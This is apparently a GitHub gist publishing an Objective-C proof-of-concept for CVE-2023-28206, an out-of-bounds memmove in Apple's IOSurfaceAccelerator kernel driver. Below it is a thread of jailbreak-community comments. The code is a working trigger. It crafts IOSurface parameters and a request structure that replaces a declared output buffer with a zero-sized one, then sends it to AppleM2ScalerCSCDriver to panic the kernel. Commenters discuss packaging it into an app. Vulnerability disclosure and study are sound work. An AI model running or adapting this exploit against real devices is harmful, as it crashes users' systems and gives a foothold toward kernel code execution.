Skip to content

Instantly share code, notes, and snippets.

@LinusHenze

LinusHenze/PoC.m Secret

Last active April 1, 2024 15:47
Show Gist options
  • Save LinusHenze/728db96a836b6817ecb727cfbde606b3 to your computer and use it in GitHub Desktop.
Save LinusHenze/728db96a836b6817ecb727cfbde606b3 to your computer and use it in GitHub Desktop.
A PoC for CVE-2023-28206
//
// PoC.m
// IOSABugTrigger
//
// Created by Linus Henze on 2023-04-08.
// Copyright © 2023 Pinauten GmbH. Some rights reserved.
//
//
// This is a PoC for CVE-2023-28206, triggering an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
//
// License: MIT
//
#import <CoreFoundation/CoreFoundation.h>
#import <Foundation/Foundation.h>
#import <IOSurface/IOSurfaceTypes.h>
#import <IOSurface/IOSurfaceRef.h>
#import <IOKit/IOKitLib.h>
#import <stdio.h>
#import <assert.h>
#import <stdint.h>
#import <dlfcn.h>
struct CommApiData {
uint32_t inType;
void *inBuf;
uint32_t inBufSize;
uint32_t outType;
void *outBuf;
uint32_t outSize;
};
uint64_t (*prepareTransformBuffersAndOptions)(IOSurfaceRef a, IOSurfaceRef b, CFDictionaryRef dict, bool unk, void *buf);
// This function triggers an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
kern_return_t trigger_memmove_oob_copy(void) {
void *iosaHndl = dlopen("/System/Library/PrivateFrameworks/IOSurfaceAccelerator.framework/IOSurfaceAccelerator", RTLD_NOW);
prepareTransformBuffersAndOptions = dlsym(iosaHndl, "prepareTransformBuffersAndOptions");
NSDictionary *dict = @{
(__bridge NSString*) kIOSurfaceWidth: @1024,
(__bridge NSString*) kIOSurfaceHeight: @1024,
(__bridge NSString*) kIOSurfaceBytesPerElement: @4,
(__bridge NSString*) kIOSurfaceBytesPerRow: @(1024 * 4),
(__bridge NSString*) kIOSurfaceAllocSize: @(1024 * 1024 * 4),
(__bridge NSString*) kIOSurfacePixelFormat: @((uint32_t) 'RGBA'),
@"HDREnable": @YES,
// This is required for some reason
@"HistogramPixelBins": @[
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX,
@UINT32_MAX
]
};
IOSurfaceRef srcSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
memset(IOSurfaceGetBaseAddress(srcSurf), 0xF0, 1024 * 1024 * 4);
IOSurfaceRef destSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
void *dataBuf = malloc(0x170);
memset(dataBuf, 0, 0x170);
uint64_t rr = prepareTransformBuffersAndOptions(srcSurf, destSurf, (__bridge CFDictionaryRef) dict, 0, dataBuf);
assert(!rr);
struct CommApiData *apiDat = (struct CommApiData*) ((uintptr_t) dataBuf + 0xD0);
// Tell the kernel we want to do some HDR stuff
int i = 0;
uint32_t *pwnData = malloc(0x4000 * 4); // Need to allocate enough space because otherwise...
pwnData[i++] = 2; // Number of properties
pwnData[i++] = 100; // Size of properties
pwnData[i++] = 'base'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
pwnData[i++] = 'basf'; // Tag
pwnData[i++] = 4; // Size of data for this tag
pwnData[i++] = 0; // Value
// THIS IS THE REAL TRIGGER
apiDat[0].inType = 3;
apiDat[0].inBuf = pwnData;
apiDat[0].inBufSize = 0x4000 * 4;
apiDat[0].outType = 2;
apiDat[0].outBuf = malloc(0x4000);
apiDat[0].outSize = 0x1008; // Tell the kernel that we have 0x1008 bytes of space (this is the minimum)...
apiDat[2].inType = 3;
apiDat[2].inBuf = pwnData;
apiDat[2].inBufSize = 0x4000 * 4;
apiDat[2].outType = 2;
apiDat[2].outBuf = malloc(0x4000);
apiDat[2].outSize = 0; // ...and then replace the buffer with one of size zero!
io_service_t service = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("AppleM2ScalerCSCDriver"));
assert(service);
io_connect_t conn = 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self_, 0, &conn);
assert(kr == KERN_SUCCESS);
assert(conn);
IOObjectRelease(service);
kr = IOConnectCallStructMethod(conn, 1, dataBuf, 0x170, NULL, NULL);
// Kernel should have paniced at this point
assert(false);
return kr;
}
@HellGateAI
Copy link

stfu 🤭

yo??? ios 16 jb eta s0n????

stfu 🤭

@GeoSn0w
Copy link

GeoSn0w commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@katyapms1
Copy link

yo??? ios 16 jb eta s0n????

stfu

@qx-775
Copy link

qx-775 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@Arzumify
Copy link

stfu

@strawbberrys
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

@adelmehenni
Copy link

yo??? ios 16 jb eta s0n????

stfu

@safebuffer
Copy link

yo??? ios 16 jb eta s0n????

stfu

@SushiDesigner
Copy link

yo??? ios 16 jb eta s0n????

stfu

❤️
@pizzaboxer

@strawbberrys
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

No, up to 16.4

16.4.1 India

@HirokazMogi
Copy link

ド素人ですが、このコードはどうやってデバイスに書き込むのですか?

@circularsprojects
Copy link

😭😭

@iarchiveml
Copy link

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

stfu

@PeanutStick
Copy link

I love this community.

@dualra1n
Copy link

amazing exploit with just 116 lines of code. so cool. thank you for realase

@PARKasd
Copy link

PARKasd commented Apr 15, 2023

I love this community.

Except Dev, We all love this community

@Diowboss
Copy link

yo??? ios 16 jb eta s0n????

Stfu

@KevinAlavik
Copy link

Make an app with this now

@PARKasd
Copy link

PARKasd commented Apr 22, 2023

Make an app with this now

In fact there is. But It only makes kernel panic

@KevinAlavik
Copy link

@PARKasd yeah thats what i want, but wheere is this app i have seen twitter posts about it but havent seen nay release, i might make one

@PARKasd
Copy link

PARKasd commented Apr 29, 2023

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

@KevinAlavik
Copy link

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

Alr

@Arzumify
Copy link

is there any writeup about the bug?? How in the hell this bug is being triggered by only assigning apiDat[2] to zero since 0x1008 being minimum?

An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28206

Check the damn CVE 🤣

@itsnebulalol
Copy link

yo??? ios 16 jb eta s0n????

stfu

@circularsprojects
Copy link

now we got PPL BYPASS FOR IOS 16 LMFAO that guy must be happy rn

waow no way pp bypas

@Arzumify
Copy link

Arzumify commented Jan 9, 2024

Kfd moment

@TheGithubJoshua
Copy link

App for this?

@Arzumify
Copy link

App for this?

To build it, you use a wonderful tool known as 'clang'

@Arzumify
Copy link

yo??? ios 16 jb eta s0n????

stfu

Somewhere in April - December
Hopefully
Now none of you go making opa334 leave I swear to the jailbreak gods

@Arzumify
Copy link

and it happened lol

Dopamine 2 my beloved

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment